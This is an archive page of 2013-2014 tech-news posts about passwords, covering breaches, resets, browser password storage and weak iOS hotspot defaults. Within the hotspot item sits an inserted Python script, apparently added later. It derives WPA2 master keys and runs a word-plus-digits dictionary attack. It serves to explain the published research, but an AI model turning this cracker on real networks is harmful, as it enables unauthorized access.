password
What is Heartbleed, anyway?
If you're an IT professional, gadget blogger or token geek in your circle of friends, chances are, you've been hounded relentlessly over the past couple of days about "this Heartbleed thing." "Do I need to update my antivirus?" "Can I login to my bank account now?" "Google already fixed it, right?" We've heard them all, but the answers aren't all that clear or simple. In an attempt to take the pressure off -- it is the weekend after all -- we've put together a primer that should answer all of those questions and a few more. Next time someone asks you about that "Heartbleed thing," just shoot them in our direction.
Jose Andrade, 04.12.2014

LastPass for Android can now fill your app logins in for you
You may know LastPass, the cross-platform password manager, as a safe haven for website login details and common form info. Now, as well as playing nice with Chrome for mobile devices, the latest version of LastPass for Android can fill in app login data for you, too. Once it's updated and you've authorized this new feature, loading up an app with a username / password prompt will trigger a pop-up with suggested login credentials you can choose to inject. Chances are, however, you'll need to tell LastPass which of the logins stored in your vault the mobile app wants -- you can also share your selection if you'd like to help it learn common associations. Because apps are often mobile portals for services you'd load up inside a browser on your computer, it makes sense. Then again, we can't say we sign in and out of apps enough to justify $12 per year for the premium service LastPass' mobile apps require.
Jamie Rigg, 03.26.2014

Twitter accidentally mass-resets user passwords, blames 'system error'
Don't freak out, your Twitter account wasn't hacked. Well, probably. Many users were summarily locked out of their Twitter account on Monday evening, and were then sent an email requesting that they reset their password. However, it wasn't nefarious hackers or bots, but a system error. Twitter has released a statement, saying that it had "unintentionally sent some password reset notices tonight due to a system error." According to Recode, the error affected less than one percent of Twitter users. If you're an unlucky one-percenter, you should be able to reclaim access after you've updated your password. [Thanks to everyone who sent this in.]
Mat Smith, 03.04.2014

Mnemonizer uses one weird trick to obscure passwords
I subscribe to the xkcd school of password philosophy. Multiple words are a big pain to type, but they offer good security and memorization. If you prefer to use shorter codes, especially for touch-input devices, consider Mnemonizer (US$0.99). It provides a novel security approach, enabling you to obscure your codes in plain text. The app works by providing a random data generator, which surrounds your PIN codes and passwords with similar-looking elements. You pick the pattern and enter your custom data by editing whichever cells you desire. You can build your item in a simple line, as a skip pattern or even as a zig-zag. However you hide your information, the app provides a camouflaging environment to surround it. Once created, add a context name and your stored information is ready to use. Aesthetically, I found the interface to be gorgeous. There are some absolutely lovely design choices that make the app a pleasure to use. Less pleasurable, however, is how easy it is to reset data for any password. If you tap the scramble option, your cells reset, replaced with random values. All stored information is lost. Unfortunately, you don't need any special password or privileges to do this, so anyone randomly picking up your phone can really mess up your saved information. The app really needs a passcode to enable any data modification for existing mnemonized items. I don't think I'd use this app to store long values like credit card numbers and I suspect I'd use the same visual sequence across every PIN, which would introduce its own vulnerability. Once anyone figured out one of my PINs they'd have access to all of them. Even if this particular app doesn't really work with my personal style, I suspect it will be valuable enough for those who can leverage its clever approach. That said, I look forward to seeing what other apps the developer creates. 
I really liked the supporting elements even if the main feature isn't really my thing, and I'd love to see those great design touches in other apps.
Erica Sadun, 02.06.2014

Mozilla makes it a lot easier to sync Firefox bookmarks and passwords
Firefox users keen to keep their browsing data up-to-date across devices will soon have one less headache to worry about. Mozilla, makers of the popular open-source browser, has decided to do away with synchronization keys for its Firefox Sync service, opting instead to utilize a simple email and password combo similar to Google Chrome accounts. The change comes after users were forced to store an auto-generated authorization code, which, if lost, would render their bookmarks, passwords and browsing history inaccessible. While it means Sync accounts are a little more traceable, in that Sync data will be directly linked with a user's email address, the new process will enable Firefox users to quickly restore their browsing data in the event of a catastrophe like a hard drive failure. Mozilla is currently testing the new version of Firefox Sync in Nightly browser builds, meaning you'll need to install a beta version of Firefox to try it, but we expect it to make its way to a public release in the not-too-distant future.
Matt Brian, 02.04.2014

Google rolls out extra password security to Chrome for Windows
When Google finally relented and tightened Chrome security in order to better protect user passwords, it was available only to Mac users. As spotted by Chrome enthusiast François Beaufort, that feature has now come to Windows, and asks users to authenticate themselves with their OS account password before they can access saved credentials inside their browser. Previously, users could access a plaintext list of saved passwords by pointing the browser at "chrome://settings/passwords," offering easy access to a third party if their computer was left unattended. While the feature has yet to make it to the public version of the browser, its inclusion in the latest Chromium builds for Windows and Mac suggests it won't be long until password-protected passwords roll out to all.
Matt Brian, 12.04.2013

Sony resetting some PSN passwords as a 'precautionary measure'
PSN users around the world have been booting up their various consoles only to be confronted with a message saying their passwords are incorrect. They've then had to go through the rigmarole of creating new login details, usually while still in the dark as to what happened to their accounts in the first place -- and whether they might have been hacked. Sony has since put out an explanation via various official channels in the US, EU and Japan, saying that only "some" users have been affected and that the password resets are "purely a precautionary measure" for "routine protection." We've contacted the company for clarification on its policy about contacting users individually in this sort of situation, and also to see if we can find out a little more about this "non-specific" threat to certain accounts.
Sharif Sakr, 11.26.2013

NSA reportedly cracks down on staff who thought it was okay to share their logins with Edward Snowden
In a slightly ironic twist for the National Security Agency, Reuters reports that as many as 25 members of its staff have been "removed from their assignments" because they shared their private passwords with Edward Snowden while he worked there. A number of government offices are currently trying to find out just how Snowden got hold of so much confidential data, and sources close to those investigations now claim that the PRISM whistleblower used his position as a systems admin to dupe colleagues into handing over their passwords. It's not clear whether the NSA staff involved in the breach have been fired or re-assigned, but if the allegations are true then there are likely to be some red faces at the agency once the various investigations reach their conclusions, because such a large-scale failure by supposedly highly-trained staff would implicate the NSA's systems and practices, rather than just a few naive individuals.
Sharif Sakr, 11.08.2013

Google finally tightens access to saved passwords in Chrome
Having come under fire over its relaxed attitude towards saved passwords in Chrome earlier in the year, Google is finally looking to do something about it. In a post to his Google+ page, Chrome tinkerer François Beaufort notes that the company will now ask users to authenticate themselves using a system password before they can access saved credentials inside Chrome. Previously, users could access the list of saved passwords by pointing the browser at "chrome://settings/passwords," offering easy access should their computer be left unattended. As it stands, the feature appears limited to the latest Chromium build for Mac, mimicking the behavior of Apple's own web browser: Safari. While there's no word on whether Google intends to implement the feature inside Chrome for Windows, its inclusion on the Mac suggests it could be present inside a public release in the near future. [Image Credit: Francois Beaufort, Google+]
Matt Brian, 11.04.2013

Blizzard's tips for dealing with a locked account
Having your account locked isn't an uncommon problem -- and it doesn't necessarily mean your account has been compromised. Because Blizzard is trying to stop hackers in their tracks, doing anything that makes it look like you aren't the one playing the game -- like logging in from an unusual location -- can trigger a lock. So what's a gamer to do when hit with a locked account? Fortunately for all of us, Blizzard CS representative Araxom has explained how to avoid locked account woes -- without even getting in touch with customer support. An easy fix? Change your password from your new computer or new location. This requires you to authenticate with Blizzard -- and answer your secret question -- so the servers are sure that you're actually you. Another helpful tidbit: have an authenticator (or authenticator app) attached to your account and SMS protect enabled. These helpful security features not only make it harder for your account to get stolen -- they can make it clear to Blizzard that your account is in your hands, even if you're logging on from a new computer. For more details and tips, check out Araxom's thread on Reddit. And if your account actually has been hacked, it's going to take a few more steps, but we'll walk you through it.
Elizabeth Harper, 10.27.2013

Finding passwords saved in Chrome is surprisingly easy, Google security lead sees no issue
Most browsers will ask if you want your passwords saved so when you're next jumping around the web, logging into sites is that bit easier. Of course, you'd like to think those passwords are squirreled away where no one can dig them up, but in Chrome they're pretty easy to find. As highlighted by software developer Elliott Kember recently, getting access to the list of saved passwords requires only that you point the browser at "chrome://settings/passwords" (or simply find the password management option in advanced settings) and click on one of the saved entries. A small "show" button will then appear next to the hidden password -- hit that and it'll be revealed. Calling this a major security flaw, as some have, is obviously a tad sensationalistic. Nevertheless, recent attention has shown that making saved password access so simple is a concern for some. Several other browsers give users the option to protect that list with a master password, but Chrome does not -- even if you sign out of the browser, data linked to your Google account remains visible on that computer. Justin Schuh, Chrome security tech lead, has responded to internet chatter on the topic, saying that once past the OS login stage, someone can theoretically find your passwords and all manner of other browser info out anyway, using various underhand means: the OS user session, not the browser, is the security boundary, and anyone who can run code as you can read anything the browser can. His statement isn't likely to calm those who'd like to see their passwords more secure, but perhaps the fact people are talking will force Google to consider some changes. Update: This post has been edited with some additional context and commentary.
Jamie Rigg, 08.07.2013

Tumblr releases emergency update to fix password-sniffing bug
Tumblr has released an emergency update for its iOS app to fix a bug that allowed people to sniff out passwords. Tumblr was notified of the security vulnerability today. The company says that if you have been using its iOS apps, you should also update your Tumblr password and your password on any sites where you use the same password. From the company's blog: Important security update for iPhone/iPad users We have just released a very important security update for our iPhone and iPad apps addressing an issue that allowed passwords to be compromised in certain circumstances¹. Please download the update now. If you've been using these apps, you should also update your password on Tumblr and anywhere else you may have been using the same password. It's also good practice to use different passwords across different services by using an app like 1Password or LastPass. Please know that we take your security very seriously and are tremendously sorry for this lapse and inconvenience. ¹ "Sniffed" in transit on certain versions of the app Tumblr can be downloaded from the App Store. By downloading the latest version you will have closed the password security hole.
Michael Grothaus, 07.17.2013

Tumblr for iOS receives critical security update, users urged to change passwords
A fresh version of Tumblr just hit iOS devices less than a week ago, but now the Yahoo-owned service is pushing out a newer release with "a very important security update." Not only is the outfit recommending that users download the tweaked app immediately, but it's also asking folks to change their password on Tumblr and on any other service they use the same passphrase. There's no mention of a breach or exactly what the new code patches up, but we'll keep you in the proverbial loop as we learn more. Update: We've gotten word from Tumblr that it was notified of a security vulnerability and immediately dispatched the update to remedy the issue. Hit the break to read the outfit's entire statement.
Alexis Santos, 07.16.2013

PSA: You can now use your Amazon account to log into Lovefilm
You might be able to knock one password off your list, as you now have the option to log in to your Lovefilm account using Amazon credentials. The changeover is part of the online retail giant's recently announced Login With Amazon initiative, intended to let you use a universal ID for its other websites or those of third party developers. To switch, you'll need to follow the link at the source and enter both your Lovefilm and Amazon details, and may need to re-enter payment info as well. The company promised that your private data will remain "completely safe," and said that any rental lists, bookmarks, viewing history and watchlists will stay put. On the off-chance you're on Lovefilm but don't have an Amazon account, the company wouldn't be averse to your creating one at the same time, in case you fancy physical disc media to go along with the streaming variety. That's not the only change Lovefilm users may notice however, as the service has rolled out versions of its next generation streaming app -- first seen on the PS3 -- for the Xbox 360 as well as Sony Bravia TVs, Blu-ray players and home theater systems.
Steve Dent, 06.26.2013

Researchers easily crack iOS-generated Hotspot passwords
When you enable the Personal Hotspot feature on your iPhone, iOS will generate a password on your behalf. It's convenient, but recent research from FAU in Germany suggests it is not very secure. According to researchers Andreas Kurtz, Felix Freiling and Daniel Metz, the default hotspot password in iOS 6 uses a short English word with some random numbers at the end. Earlier versions of iOS used a similar pattern that included two words separated by two numbers. Not surprisingly, these passwords can be cracked in no time via a brute-force attack. Using one AMD Radeon HD 6990 GPU, the team was able to guess a password in 50 minutes. When they bumped the GPUs up to four AMD Radeon HD 7970s, they were able to drop the password-cracking time to a mere 50 seconds. One reason the cracking was so easy is that Apple's generator draws from a word list of roughly 52,500 entries but only ever picks 1,842 of them, and the selection of these words is not done randomly. It wouldn't take much effort for a savvy hacker to figure out this pattern and write a tool that would compromise a hotspot password faster than you can say supercalifragilisticexpialidocious. The take home message is to change your hotspot password from the default one that is generated by iOS to one of your own choosing. It's easy enough to do -- just tap Settings > Personal Hotspot or Settings > General > Cellular > Personal Hotspot, depending on your device and software. Then tap the WiFi password field and type in a new phrase. The new password must be at least eight characters long and use ASCII/Unicode characters. You can read more about the Personal Hotspot feature on Apple's iOS support page. [Via Engadget]
Kelly Hodgkins, 06.19.2013

Researchers able to predict iOS-generated hotspot passwords in less than a minute
Anyone who's tried to tether to their iPhone or iPad will recall how iOS manages to craft its own passwords when used as a personal hotspot. The aim is to ensure that anyone sharing a data connection will get some degree of security, regardless of whether or not they tinker with the password themselves. However, three researchers from FAU in Germany have now worked out the structure behind these auto-generated keys -- a combination of a short English word and a series of random numbers -- and managed to crack that hotspot protection in under a minute. To start, the word list contains about 52,500 entries, and once the testers were able to capture a WiFi connection, they used an AMD Radeon HD 6990 GPU to cycle through all those words with number codes, taking just under 50 minutes to crack with rote entry. Following that, they realized that only a small subset (just 1,842) of the word list was being used. With an even faster GPU -- a cluster of four AMD Radeon HD 7970s -- they got the hotspot password cracking time to 50 seconds. The Friedrich-Alexander University researchers added that unscrupulous types could use comparable processing power through cloud computing. "System-generated passwords should be reasonably long, and should use a reasonably large character set. Consequently, hotspot passwords should be composed of completely random sequences of letters, numbers, and special characters," says the report, which outlines the trade-off between security and usability. However, as ZDNet notes, Apple's cycled password approach still offers more protection than static options found elsewhere. Check out the full paper at the source.
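The two posts above give enough figures to work the arithmetic behind the attack. This is an added example, not code from the FAU researchers or from Engadget: it models the iOS 6 default as word plus a numeric suffix (the four-digit suffix length is an assumption; the page only says "some random numbers"), derives the guess rates the reported 50-minute and 50-second runs imply, compares them against a random 8-character passphrase, and runs a toy dictionary-plus-suffix attack against a WPA2 pairwise master key. The PMK derivation (PBKDF2-HMAC-SHA1 over the SSID, 4096 rounds, 32 bytes) is the real IEEE 802.11i one; the word list and SSID are constructed for the demo and are not Apple's.

```python
"""Keyspace math for iOS-style hotspot passwords and a WPA2-PSK dictionary attack.

Added example; not from the paper or the page. Constructed inputs are labelled.
"""
import hashlib
from typing import Iterable, Iterator, Optional

# From the page: ~52,500 words in Apple's list, only 1,842 of them ever chosen.
WORDLIST_SIZE = 52_500
WORDS_ACTUALLY_USED = 1_842
# Assumption for this example: the numeric suffix is four digits.
SUFFIX_DIGITS = 4
PRINTABLE_ASCII = 95            # 0x20..0x7e, the usual "random password" alphabet

WPA2_PBKDF2_ROUNDS = 4096       # fixed by IEEE 802.11i
PMK_LEN = 32


def keyspace(words: int, digits: int = SUFFIX_DIGITS) -> int:
    """Number of <word><suffix> candidates: every word paired with every suffix."""
    return words * 10 ** digits


def implied_guess_rate(words: int, seconds: float, digits: int = SUFFIX_DIGITS) -> float:
    """Guesses per second needed to exhaust keyspace(words, digits) in `seconds`."""
    return keyspace(words, digits) / seconds


def seconds_to_exhaust(alphabet_size: int, length: int, rate: float) -> float:
    """Time to try every string of `length` symbols from an alphabet at `rate` guesses/s."""
    return alphabet_size ** length / rate


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32).

    A cracker holding a captured 4-way handshake recomputes this per guess, so its
    cost is what sets the guess rate. The 8..63 byte passphrase limit is not enforced.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               WPA2_PBKDF2_ROUNDS, PMK_LEN)


def candidates(words: Iterable[str], digits: int = SUFFIX_DIGITS) -> Iterator[str]:
    """Enumerate every <word><zero-padded suffix> combination, word-major."""
    for word in words:
        for n in range(10 ** digits):
            yield f"{word}{n:0{digits}d}"


def crack_pmk(target_pmk: bytes, ssid: str, words: Iterable[str],
              digits: int = SUFFIX_DIGITS) -> Optional[str]:
    """Dictionary-plus-suffix attack: return the passphrase whose PMK matches, or None."""
    for guess in candidates(words, digits):
        if wpa2_pmk(guess, ssid) == target_pmk:
            return guess
    return None


# Constructed demo inputs (not Apple's list): four words and an SSID.
DEMO_WORDS = ["ocean", "suave", "alone", "basil"]
DEMO_SSID = "iPhone"
DEMO_PASSPHRASE = "ocean0307"   # constructed target; lies 308 guesses into the sweep


def demo() -> dict:
    """Reproduce the page's figures and crack a constructed target."""
    # 50 minutes on one HD 6990 over the full list; 50 seconds on four HD 7970s
    # once only the 1,842 words actually used are tried.
    rate_6990 = implied_guess_rate(WORDLIST_SIZE, 50 * 60)
    rate_4x7970 = implied_guess_rate(WORDS_ACTUALLY_USED, 50)
    year = 365.25 * 24 * 3600
    random8_years = seconds_to_exhaust(PRINTABLE_ASCII, 8, rate_4x7970) / year
    cracked = crack_pmk(wpa2_pmk(DEMO_PASSPHRASE, DEMO_SSID), DEMO_SSID, DEMO_WORDS)
    return {
        "full_keyspace": keyspace(WORDLIST_SIZE),          # 525,000,000
        "used_keyspace": keyspace(WORDS_ACTUALLY_USED),    # 18,420,000
        "rate_6990": rate_6990,                            # 175,000 guesses/s
        "rate_4x7970": rate_4x7970,                        # 368,400 guesses/s
        "random8_years": random8_years,                    # roughly 570 years
        "cracked": cracked,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point the numbers make: shrinking the effective word list from 52,500 to 1,842 cuts the work by a factor of 28 before any hardware change, while the same four-GPU rate against a truly random 8-character passphrase would take centuries. The full 1,842 × 10,000 sweep is not attempted here; `demo()` places its target early so it finishes in well under a second.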
Mat Smith, 06.19.2013

Amazon announces new 'Login with Amazon' service for apps, games and websites (video)
In an effort to reduce keyboard wear-and-tear, Amazon is opening up its own login service to both app developers and websites. Login With Amazon taps into your account credentials to log in, with the ability to even share parts of your profile through apps, games and sites. It uses the retailer's existing trusted sign-in security and has already been tested on both Zappos and Woot, with both trials apparently noting "significant" pickup from customers. The service is free to use and if you're thinking of adding it to your own site (and tapping into those 200 million registered Amazon users), you can find all the technical details at the source -- or a gentler explanation in a video after the break.
Mat Smith, 05.29.2013

Microsoft leak details plans for two-step authentication process
Smoke goes up. Lights fade. The crowd roars. It's 2003, and the Dave Matthews Band is about to perform what would go on to become the theme song for security processes the world over a decade later. Weird visualizations aside, it sure seems as if two-step authentication has become all the rage these days. With Google implementing the process in 2011, both Apple and Dropbox have followed, and Evernote has made clear that it's going to join the fray as soon as feasible. Now, leaked imagery is demonstrating that Microsoft might not be far behind, with a two-step verification process evidently planned for its online services. As you'd expect, the process should work pretty simply once it's instituted -- you'll need to enable two-step on your account, and then use an app on your mobile device to retrieve randomized keys when logging into a computer that's not on your trusted device list. Notably, the process isn't expected to work with linked accounts, and while a Windows Phone app appears to already be floating about, there's no word on whether Android, BlackBerry or iOS users will receive the same courtesy. Till then, keep your passwords guarded. And, of course, watch the video embedded after the break.
Darren Murph, 04.09.2013

Chrome 26 for Android gets stable release with autofill and password syncing
Perpetually forgetful Android users no longer have to adopt a Chrome beta to coordinate their lives. Just a month after the test version of Chrome 26 arrived with autofill and password syncing, its stable version has appeared with the same option to remember form and login details between supporting desktop and mobile Chrome builds. There's no talk of the SPDY-based proxy, however: aside from tune-ups, the syncing is the main highlight. That's still enough for us to justify swinging by Google Play for the update.
Jon Fingas, 04.03.2013

Evernote forces password reset after "suspicious activity"
The drumbeat of corporate security issues pounds on, with hybrid cloud/local notekeeping service Evernote reporting this weekend that its internal security team "discovered and blocked suspicious activity" aimed at sensitive areas of Evernote's service. Although neither billing information nor actual client notes were exposed in this breach, Evernote does acknowledge that some user account information -- usernames, email addresses and encrypted passwords -- was accessed. While none of the user passwords were stored in the clear, the fact that they may be in the hands of hackers (along with the corresponding user credentials) led Evernote to force a password reset for all its millions of users. If you've gotten a password reset notice from Evernote, it's almost certainly legitimate, but in the interest of proper procedure you should not click the login link in the email. Open a trusted browser (these days, that means one with Java applets disabled) and type in "www.evernote.com" directly to reset your login credentials. If you need help generating and storing a strong password, our guide to password creation is here for you. As more and more cloud services are subject to attacks that target user login details, it's become overwhelmingly clear that just having a strong password isn't enough; if you reused your Evernote password on any other service (especially your email account), you have a potentially serious problem. Managing unique passwords for scores or hundreds of accounts is no picnic, but utilities like 1Password or LastPass can make it easier to find and change your re-used passwords.
Michael Rose, 03.03.2013